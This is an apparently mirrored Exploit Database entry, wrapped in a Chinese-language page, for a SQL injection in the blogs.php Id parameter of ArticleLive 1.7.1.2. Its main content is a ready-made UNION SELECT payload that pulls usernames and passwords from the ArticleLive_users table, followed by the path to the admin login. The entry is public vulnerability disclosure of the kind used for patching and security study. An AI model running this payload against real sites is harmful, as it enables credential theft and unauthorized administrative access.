ArticleLive 1.7.1.2 – ‘blogs.php?Id’ SQL Injection

Exploit Database
35 阅读

作者： BAYBORA

日期： 2010-01-01
类别：
- webapps
平台：
- asp
来源：https://www.exploit-db.com/exploits/10884/

*******************************************************************************
# Author : Baybora
# Product: ArticleLive (Interspire Website Publisher)
# Version: NX.1.7.1.2 (and possibly earlier versions)
# Download : http://www.interspire.com/
# Price: $ 249
# Site : www.1923turk.biz

 
Vulnerable script: blogs.php?Id = (SQL-injection)

---------------------------------------------------------


http://server/[path]//blogs.php?id=[SQL Inject]


blogs.php?id=-768+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,144,15,16,17,18,19,20,21,22,23,24,25,26,27+from+ArticleLive_users+limit+01--


Admin Login->


http://server/[path]/admin/


"""""""""""""""""""""

Gamoscu - Manas58 - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO

last Exploits
ArticleLive 1.7.1.2 – ‘blogs.php?Id’ SQL Injection的更多信息

Geonetwork 4.2.0 – XML External Entity (XXE)：
Erolife AjxGaleri VT – Database Disclosure：
PaysiteReviewCMS – ‘image.php’ Cross-Site Scripting：
Oxwall 1.7.4 – Cross-Site Request Forgery：
WordPress Plugin Booking System (Booking Calendar) – ‘booking_form_id’ SQL Injection：
ReQuest Serious Play Media Player 3.0 – Directory Traversal File Disclosure：
OpenEMR 5.0.0 – OS Command Injection / Cross-Site Scripting：
x10 mirco blogging 121 – SQL Injection：